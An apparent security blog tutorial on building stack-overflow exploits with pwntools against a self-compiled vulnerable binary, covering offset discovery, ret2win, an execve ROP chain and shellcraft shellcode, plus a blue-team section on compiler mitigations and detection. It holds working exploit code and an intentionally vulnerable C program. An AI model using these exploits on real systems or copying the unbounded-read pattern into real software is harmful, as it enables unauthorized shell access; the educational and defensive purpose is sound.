Writing Exploits with pwntools: From cyclic to ROP and shellcode

Time it takes to read this article 6 minutes.

Disclaimer: This article is for education and authorized security testing only. Run the techniques shown here exclusively against binaries you own or are explicitly permitted to test (CTF challenges, your own lab VMs, scoped engagements). Exploiting systems without written authorization is illegal in virtually every jurisdiction.

Table of contents

Introduction / Overview
How it works / Background
Prerequisites / Lab setup
Walkthrough / PoC
Detection & Defense (Blue Team)
Conclusion
References

Introduction / Overview

pwntools is the de facto standard CTF and exploit-development framework for Python. Instead of hand-rolling socket code, struct packing, and offset math for every challenge, it gives you a coherent API: remote() for the network, ELF() for symbol resolution, p64()/u64() for packing, cyclic() for offset discovery, the ROP object for gadget chaining, and shellcraft for assembly generation.

This post walks through a complete workflow against a deliberately vulnerable 64-bit Linux binary, then gives equal time to the blue-team side: how the bugs we abuse are detected and how modern mitigations defeat them.

How it works / Background

A classic stack-based buffer overflow occurs when a program writes more data into a fixed-size stack buffer than it can hold, overwriting the saved return address. On x86-64 Linux, control flow is hijacked when the overwritten return address is popped into RIP at the ret instruction.

Modern targets ship mitigations that shape the exploit:

NX / DEP marks the stack non-executable, so you can't just jump to shellcode on the stack — you pivot to ROP (Return-Oriented Programming), chaining existing executable gadgets that end in ret.
ASLR randomizes library/stack base addresses, so you typically need an information leak first.
Stack canaries place a random value before the saved RIP; overwriting it triggers __stack_chk_fail.

pwntools doesn't bypass mitigations for you, but it removes nearly all the boilerplate involved in constructing each stage. Check protections quickly with the bundled checksec:

checksec --file=./vuln
# RELRO   STACK CANARY   NX        PIE
# Partial No canary      NX enabled No PIE

checksec --file=./vuln
# RELRO   STACK CANARY   NX        PIE
# Partial No canary      NX enabled No PIE

Bash

Prerequisites / Lab setup

Install pwntools into a virtualenv and grab the helper CLI tools:

python3 -m venv .venv && source .venv/bin/activate
pip install pwntools          # pulls in pwn, checksec, cyclic, ROPgadget deps

python3 -m venv .venv && source .venv/bin/activate
pip install pwntools          # pulls in pwn, checksec, cyclic, ROPgadget deps

Bash

Build a small vulnerable target. NX is on, PIE and the canary are off so we can focus on the core APIs:

cat > vuln.c <<'EOF'
#include <stdio.h>
#include <unistd.h>
void win() { execve("/bin/sh", 0, 0); }   // present but not called
void vuln() { char buf[64]; read(0, buf, 512); }
int main() { setvbuf(stdout, 0, 2, 0); vuln(); return 0; }
EOF

gcc -fno-stack-protector -no-pie -o vuln vuln.c

cat > vuln.c <<'EOF'
#include <stdio.h>
#include <unistd.h>
void win() { execve("/bin/sh", 0, 0); }   // present but not called
void vuln() { char buf[64]; read(0, buf, 512); }
int main() { setvbuf(stdout, 0, 2, 0); vuln(); return 0; }
EOF

gcc -fno-stack-protector -no-pie -o vuln vuln.c

Bash

Expose it on a port to mimic a remote service:

socat TCP-LISTEN:1337,reuseaddr,fork EXEC:./vuln

socat TCP-LISTEN:1337,reuseaddr,fork EXEC:./vuln

Bash

Walkthrough / PoC

Step 1 — Find the offset with cyclic

cyclic(n) generates a De Bruijn sequence where every 4-byte (or 8-byte) substring is unique. Feed it in, read the faulting value out of the core dump or debugger, and cyclic_find() returns the exact offset.

from pwn import *

context.update(arch='amd64', os='linux', log_level='info')

io = process('./vuln')
io.send(cyclic(200))
io.wait()

core = io.corefile
fault = core.read(core.rsp, 8)       # value at RSP when it crashed
offset = cyclic_find(fault[:4])      # 4-byte chunk for the lookup
log.success(f'offset to saved RIP = {offset}')   # -> 72

from pwn import *

context.update(arch='amd64', os='linux', log_level='info')

io = process('./vuln')
io.send(cyclic(200))
io.wait()

core = io.corefile
fault = core.read(core.rsp, 8)       # value at RSP when it crashed
offset = cyclic_find(fault[:4])      # 4-byte chunk for the lookup
log.success(f'offset to saved RIP = {offset}')   # -> 72

Python

That 72 (64-byte buffer + 8-byte saved RBP) is the distance to the return address.

Step 2 — Resolve symbols with ELF

Because PIE is disabled, win() lives at a fixed address. ELF() parses the symbol table so you never hardcode addresses:

elf = ELF('./vuln')
win_addr = elf.symbols['win']
log.info(f'win() @ {hex(win_addr)}')

elf = ELF('./vuln')
win_addr = elf.symbols['win']
log.info(f'win() @ {hex(win_addr)}')

Python

Step 3 — Pack the payload with p64

p64() packs an integer little-endian into 8 bytes (its inverse is u64()). The first version just redirects execution to win():

payload  = b'A' * offset
payload += p64(win_addr)

io = remote('127.0.0.1', 1337)   # the network endpoint
io.sendline(payload)
io.interactive()                 # drop into the shell

payload  = b'A' * offset
payload += p64(win_addr)

io = remote('127.0.0.1', 1337)   # the network endpoint
io.sendline(payload)
io.interactive()                 # drop into the shell

Python

If a MOVAPS alignment fault aborts execve, prepend a bare ret gadget to realign RSP to a 16-byte boundary — a very common gotcha on modern glibc.

Step 4 — Build a chain with ROP

Calling a one-liner is trivial; real targets need arguments. The ROP object auto-discovers gadgets and assembles the chain. Here we call execve("/bin/sh", NULL, NULL) ourselves rather than relying on a convenient win():

libc = elf.libc                    # the linked libc ELF object
rop  = ROP([elf, libc])

binsh = next(libc.search(b'/bin/sh\x00'))
rop.execve(binsh, 0, 0)            # pwntools picks pop rdi/rsi/rdx gadgets
print(rop.dump())                  # human-readable gadget chain

payload = flat({offset: rop.chain()})
io.sendline(payload)

libc = elf.libc                    # the linked libc ELF object
rop  = ROP([elf, libc])

binsh = next(libc.search(b'/bin/sh\x00'))
rop.execve(binsh, 0, 0)            # pwntools picks pop rdi/rsi/rdx gadgets
print(rop.dump())                  # human-readable gadget chain

payload = flat({offset: rop.chain()})
io.sendline(payload)

Python

flat() builds the buffer by placing rop.chain() at byte offset offset and zero-filling the rest. rop.dump() prints each gadget address and its effect, which is invaluable when a chain misbehaves.

Step 5 — Generate shellcode with shellcraft

When the stack is executable (no NX), skip ROP entirely and let shellcraft emit architecture-specific assembly that asm() turns into bytes:

context.arch = 'amd64'
sc = shellcraft.amd64.linux.sh()   # /bin/sh execve stub as assembly
shellcode = asm(sc)
log.info(f'shellcode is {len(shellcode)} bytes')

payload = shellcode.ljust(offset, b'\x90') + p64(stack_buf_addr)

context.arch = 'amd64'
sc = shellcraft.amd64.linux.sh()   # /bin/sh execve stub as assembly
shellcode = asm(sc)
log.info(f'shellcode is {len(shellcode)} bytes')

payload = shellcode.ljust(offset, b'\x90') + p64(stack_buf_addr)

Python

shellcraft.amd64.linux.sh() returns the assembly text; asm() assembles it. There are dozens of templates (cat, connect, bind, dupsh) under shellcraft.<arch>.linux.

End-to-end exploit flow

Writing Exploits with pwntools: From cyclic to ROP and shellcode diagram 1

The diagram shows the decision points: NX steers you between raw shellcode and ROP, while ASLR decides whether you need a leak before finalizing the payload.

Detection & Defense (Blue Team)

These attacks leave both build-time and run-time signals. Defenders should weight prevention as heavily as offense weights exploitation.

Compile and link with all mitigations enabled. The exact flags my lab binary disabled are the ones you want on in production:

gcc -fstack-protector-strong -D_FORTIFY_SOURCE=2 -O2 \
    -fPIE -pie -Wl,-z,relro,-z,now -Wl,-z,noexecstack \
    -o app app.c

gcc -fstack-protector-strong -D_FORTIFY_SOURCE=2 -O2 \
    -fPIE -pie -Wl,-z,relro,-z,now -Wl,-z,noexecstack \
    -o app app.c

Bash

Stack canaries (-fstack-protector-strong) abort on a clobbered canary before ret, defeating the simple overflow in Step 3.
Full RELRO (-z relro -z now) makes the GOT read-only, blocking GOT-overwrite chains.
PIE + ASLR (-fPIE -pie) randomizes the base, so the static ELF.symbols addresses in Step 2/4 are no longer valid without a leak. Confirm system ASLR with cat /proc/sys/kernel/randomize_va_space (should be 2).
NX / noexecstack forces attackers off the shellcode path in Step 5.
FORTIFY_SOURCE swaps unbounded calls for length-checked variants and can catch the read-into-fixed-buffer pattern at runtime.

Detection and runtime hardening:

Run checksec across your build artifacts in CI and fail the pipeline on missing mitigations.
Enable Control-Flow Integrity (-fcf-protection / Intel CET) and compiler-based CFI so ROP ret/indirect-jump targets are validated.
Audit for unsafe APIs (gets, strcpy, unbounded read/scanf("%s")) with static analyzers and _FORTIFY_SOURCE warnings.
Monitor for crash storms: repeated SIGSEGV in dmesg/journald or core dumps on a network service strongly indicate fuzzing or offset discovery (the Step 1 phase). Ship core-dump and segfault events to your SIEM.
Map activity to MITRE ATT&CK T1203 (Exploitation for Client Execution) and T1068 (Exploitation for Privilege Escalation) for alerting and threat-hunting coverage.
Sandbox network-facing parsers with seccomp-bpf to deny execve, neutralizing both the shellcraft and rop.execve() payloads even on a successful hijack.

For deeper static triage of an unknown binary before any of this, see Reverse Engineering with Ghidra and Defeating ASLR with Information Leaks.

Conclusion

pwntools collapses the exploit lifecycle into a handful of composable primitives: remote() for I/O, cyclic() for offsets, ELF()/p64() for symbols and packing, ROP for gadget chains, and shellcraft for shellcode. The same workflow scales from a 64-byte CTF overflow to real CVE research. Equally, every step we leaned on maps to a mitigation a defender can enable today — canaries, RELRO, PIE/ASLR, NX, CFI, and seccomp — which is exactly why understanding both sides matters. Practice on intentionally vulnerable targets first; see also Building a Local Pwn Lab.

References

pwntools documentation — https://docs.pwntools.com/
pwntools source (Gallopsled) — https://github.com/Gallopsled/pwntools
HackTricks: Stack Overflow & ROP — https://book.hacktricks.xyz/binary-exploitation/stack-overflow
MITRE ATT&CK T1203 — https://attack.mitre.org/techniques/T1203/
MITRE ATT&CK T1068 — https://attack.mitre.org/techniques/T1068/
ROPgadget — https://github.com/JonathanSalwan/ROPgadget
GCC security flags / FORTIFY_SOURCE — https://www.gnu.org/software/libc/manual/

Introduction / Overview

How it works / Background

Prerequisites / Lab setup

Walkthrough / PoC

Step 1 — Find the offset with cyclic

Step 2 — Resolve symbols with ELF

Step 3 — Pack the payload with p64

Step 4 — Build a chain with ROP

Step 5 — Generate shellcode with shellcraft

End-to-end exploit flow

Detection & Defense (Blue Team)

Conclusion

References

Comments